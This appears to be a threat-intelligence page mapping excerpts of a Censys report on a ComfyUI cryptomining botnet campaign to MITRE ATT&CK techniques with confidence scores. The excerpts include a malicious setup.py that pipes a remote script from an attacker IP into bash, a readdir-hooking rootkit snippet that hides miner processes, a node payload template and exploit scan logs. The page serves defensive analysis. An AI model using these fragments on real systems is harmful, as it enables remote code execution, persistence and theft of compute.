"…енное время") return False. After achieving RCE, the next step is to remove evidence of the exploit. The scanner does this by clearing the ComfyUI prompt history: # ======================================================…"

T1018 Remote System Discovery
84%
"continuously enumerate exposed ComfyUI instances across cloud infrastructure. The attacker used two reconnaissance tools. The first is a simple bash script that takes a list of IPs and checks 100 at a time in parallel: #!/bin/bash input=${1:-"raw.txt"} output="…"

T1098.004 SSH Authorized Keys
84%
"40.237 here, the operator generates a new SSH keypair and writes it to ~/.ssh/a100. Immediately after, they print the public key, likely to copy it into another host’s ~/.ssh/authorized_keys file for passwordless access. Shortly thereafter, we observe an SSH login at…"

T1014 Rootkit
79%
"processes matching the miner's names */ struct dirent *readdir(DIR *dirp) { struct dirent *(*orig)(DIR *) = dlsym(RTLD_NEXT, "readdir"); struct dirent *e; while ((e = orig(dirp)) != NULL) { if (_should_hide(e->d_name)) continue; // h…"

T1105 Ingress Tool Transfer
78%
"…ll that creates an anonymous, memory-backed file descriptor. The binary gets downloaded, written into this anonymous file, and executed directly from /proc/self/fd/<n>. After execve, the download archive is deleted. There is no trail left over: scn = {'x86_64'…"

T1496 Resource Hijacking
77%
"Hackers Are Attempting to Turn ComfyUI Servers into a Cryptomining Proxy Botnet. Executive Summary: Censys ARC discovered an active campaign targeting internet-exposed ComfyUI instances, where attackers exploit the custom node ecosystem to achieve RCE on unauthenticated deploymen…"

T1059.006 Python
76%
", the scanner found: Of those, the scan log shows 97 successful exploits in that single cycle, the majority via the pip install vector: 14:20:40 [pip] xxx.xxx.xxx.178:8188 pip payload delivered 14:20:40 [vuln] xxx.xxx.xxx.178:8188 payload executed! 14:24…"

T1059.006 Python
71%
"": true, "code_input": "<payload code>\noutputs = [0]\noutputs[0] = dummy_img"}}, "99": {"class_type": "PreviewImage", "inputs": {"images": ["2", 0]}}} Other node types (such as EvaluateMultiple) place the payload in different fie…"

T1190 Exploit Public-Facing Application
67%
"…падет await asyncio.sleep(5) # wait until it comes back up (up to reboot_wait seconds) for i in range(reboot_wait // 3): await asyncio.sleep(3) try: async with session.get(f"{base}/system_stats", timeout=aiohttp.ClientTimeout(total=3), ssl=False)…"

T1190 Exploit Public-Facing Application
61%
". What stands out in this investigation is the use of ComfyUI. Specifically, the operator identifies exposed ComfyUI instances running custom nodes, determines which of those nodes expose unsafe functionality, and then uses them as a pathway to remote code execution. This workflo…"

T1496 Resource Hijacking
60%
"response to active exploitation. In either case, there is clear evidence that this technique has been used successfully in the wild, and that the associated tooling is evolving rapidly. The infrastructure accessed by the operator further supports the idea that this activity is pa…"

T1059.004 Unix Shell
57%
"install git+https://…, pip clones the repo and executes setup.py. The following is the actual payload: from setuptools import setup import subprocess, os try: subprocess.Popen(['bash', '-c', 'curl -sL http://77.110.96.200/q11.txt | bash &'], stdout…"

T1190 Exploit Public-Facing Application
54%
"response to active exploitation. In either case, there is clear evidence that this technique has been used successfully in the wild, and that the associated tooling is evolving rapidly. The infrastructure accessed by the operator further supports the idea that this activity is pa…"

T1496.001 Compute Hijacking
50%
"Hackers Are Attempting to Turn ComfyUI Servers into a Cryptomining Proxy Botnet. Executive Summary: Censys ARC discovered an active campaign targeting internet-exposed ComfyUI instances, where attackers exploit the custom node ecosystem to achieve RCE on unauthenticated deploymen…"

T1496 Resource Hijacking
46%
"(8081, 3333, 5555, 6969, 9999). Wallets, mask names, and common runtimes are whitelisted so it doesn’t friendly-fire. Walk every user in /etc/passwd, read their installed crontab, and if it matches mining or curl | bash patterns, delete the entire crontab. Stop, disable,…"

T1059.004 Unix Shell
37%
", '-c', '''{bash_cmd}''']) else: subprocess.Popen(['bash', '-c', '''{bash_cmd}''']) except Exception as e: with open('err.txt', 'w') as f: f.write(str(e)) dummy_img = torch.zeros(1, 64, 64, 3)""" It should be noted he…"

T1496 Resource Hijacking
34%
"…box, honey, analysis, suspicious dmesg strings, more than ten network interfaces). If the score is high enough, the script immediately exits. Updated process masquerading: In the prior version, it hardcoded its hidden process names as khugepaged_<hash>, nv_uvm_<hash…"

T1580 Cloud Infrastructure Discovery
30%
"continuously enumerate exposed ComfyUI instances across cloud infrastructure. The attacker used two reconnaissance tools. The first is a simple bash script that takes a list of IPs and checks 100 at a time in parallel: #!/bin/bash input=${1:-"raw.txt"} output="…"

Summary
Executive Summary. Updates 2026-04-08: A few weeks after we first pulled ghost.sh (then labeled q11.txt, internally versioned as GHOST v5.1), the operator’s installer started pointing at a new file, q12.txt. We grabbed it and diffed the two. It’s the same script, just an updated version of the prior. The author versioned it internally and labeled […]